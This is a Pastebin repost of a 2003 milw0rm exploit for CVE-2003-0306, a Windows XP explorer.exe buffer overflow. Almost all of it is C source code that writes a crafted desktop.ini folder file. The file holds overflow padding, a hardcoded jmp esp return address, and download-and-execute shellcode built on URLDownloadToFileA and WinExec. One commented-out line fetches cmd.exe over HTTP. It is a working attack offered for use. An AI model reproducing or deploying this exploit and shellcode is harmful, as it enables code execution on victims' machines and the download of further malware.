Advertisement
FlyFar

Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow - CVE-2003-0306

Jan 24th, 2024
619
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.09 KB | Cybersecurity | 0 0
  1. #include <fstream.h>
  2. #include <string.h>
  3. #include <stdio.h>
  4. #include <windows.h>
  5. #include <direct.h>
  6.  
  7. char shellcode[]=
  8. //download url and exec shellcode
  9. //doesn't have any hardcoded values
  10. //except the base address of the program
  11. //searches the import table for
  12. //LoadLibraryA, GetProcAddress and ExitProcess.
  13. //by .einstein., dH team.
  14.   "\x81\xec\x40\x1f\x00\x00\xe8\x00\x00\x00\x00\x5d\x83\xed\x0b\xbf\x61\x57"
  15.   "\x7a\x74\xe8\x8c\x00\x00\x00\x89\xbd\x17\x01\x00\x00\xbf\x65\x1d\x22\x74"
  16.   "\xe8\x7c\x00\x00\x00\x89\xbd\x1b\x01\x00\x00\xbf\x17\x75\x79\x70\xe8\x6c"
  17.   "\x00\x00\x00\x89\xbd\x1f\x01\x00\x00\x8d\x85\x2c\x01\x00\x00\x50\x2e\xff"
  18.   "\x95\x17\x01\x00\x00\x8d\x9d\x33\x01\x00\x00\x53\x50\x2e\xff\x95\x1b\x01"
  19.   "\x00\x00\x6a\x00\x6a\x00\x8d\x8d\x4e\x01\x00\x00\x51\x8d\x8d\x5c\x01\x00"
  20.   "\x00\x51\x6a\x00\xff\xd0\x8d\x85\x23\x01\x00\x00\x50\x2e\xff\x95\x17\x01"
  21.   "\x00\x00\x8d\x9d\x46\x01\x00\x00\x53\x50\x2e\x8b\x9d\x1b\x01\x00\x00\xff"
  22.   "\xd3\x6a\x01\x8d\x8d\x4e\x01\x00\x00\x51\xff\xd0\x6a\x00\x2e\xff\x95\x1f"
  23.   "\x01\x00\x00\xbb\x3c\x00\x00\x01\x8b\x0b\x81\xc1\x04\x00\x00\x01\x8d\x41"
  24.   "\x14\x8b\x70\x68\x81\xc6\x00\x00\x00\x01\x8b\x06\x83\xf8\x00\x74\x51\x05"
  25.   "\x00\x00\x00\x01\x8b\x56\x10\x81\xc2\x00\x00\x00\x01\x8b\x18\x8b\xcb\x81"
  26.   "\xe1\x00\x00\x00\x80\x83\xf9\x00\x75\x2a\x81\xc3\x00\x00\x00\x01\x83\xc3"
  27.   "\x02\x33\xc9\x32\x0b\xc1\xc1\x08\x43\x80\x3b\x00\x75\xf5\x3b\xcf\x75\x04"
  28.   "\x8b\x3a\xeb\x16\x83\xc2\x04\x83\xc0\x04\x66\x83\x38\x00\x75\xc7\x83\xc6"
  29.   "\x14\x8b\x10\x83\xfa\x00\x74\xa8\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  30.   "\x00\x00\x00\x4b\x45\x52\x4e\x45\x4c\x33\x32\x00\x55\x52\x4c\x4d\x4f\x4e"
  31.   "\x00\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x54\x6f\x46\x69\x6c\x65"
  32.   "\x41\x00\x57\x69\x6e\x45\x78\x65\x63\x00\x5c\x7e\x57\x52\x46\x35\x36\x33"
  33.   "\x34\x2e\x74\x6d\x70\x00";
  34.  
  35. char unicode_header[] = "\xFF\xFE";
  36. char shell_header[] = "[.ShellClassInfo]\x0d\x0a";
  37.  
  38. #define OVERFLOW_LEN 0xA1C
  39.  
  40.  
  41. void main()
  42. {
  43.   char url[]="file://c:/winnt/system32/calc.exe";
  44.  // char url[]="http://localhost/cmd.exe";
  45.   char eip[] = "\xcc\x59\xfb\x77"; //0x77fb59cc - WinXP SP1 ntdll.dll (jmp esp)
  46.  
  47.  
  48.   char path[500];
  49.   strcpy(path,"domain HELL team");
  50.   mkdir(path);
  51.   SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
  52.   strcat(path,"\\desktop.ini");
  53.  
  54.   ofstream out(path,ios::out+ios::binary);
  55.   out.write(unicode_header,sizeof(unicode_header)-1);
  56.   char zero = 0;
  57.   for (int i=0;i<strlen(shell_header);i++)
  58.   {
  59.     out.write(&shell_header[i],1);
  60.     out.write(&zero,1);
  61.   }
  62.   char pad = 'B';
  63.   for (i=0;i<OVERFLOW_LEN;i++) out.write(&pad,1);
  64.   char ebp[] = "1234";
  65.   out.write(ebp,4);
  66.  
  67.   char pad0 = 1;
  68.  
  69.   out.write(eip,4);
  70.  
  71.   char pad2 = 'C';
  72.   for (i=0;i<12;i++) out.write(&pad,1);
  73.  
  74.  
  75.   out.write(shellcode,sizeof(shellcode)-1);
  76.   out.write(url,sizeof(url));
  77.  
  78.   int len = sizeof(shellcode)-1+sizeof(url);
  79.   printf("shellcode+url: %d bytes\n",len);
  80.   if (len%2 == 1)
  81.   {
  82.     printf("it's odd, so add 1 extra byte");
  83.     out.write(&pad2,1);
  84.   }
  85.  
  86.   out.close();
  87.  
  88. }
  89.  
  90.  
  91.  
  92. // milw0rm.com [2003-05-21]
  93.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement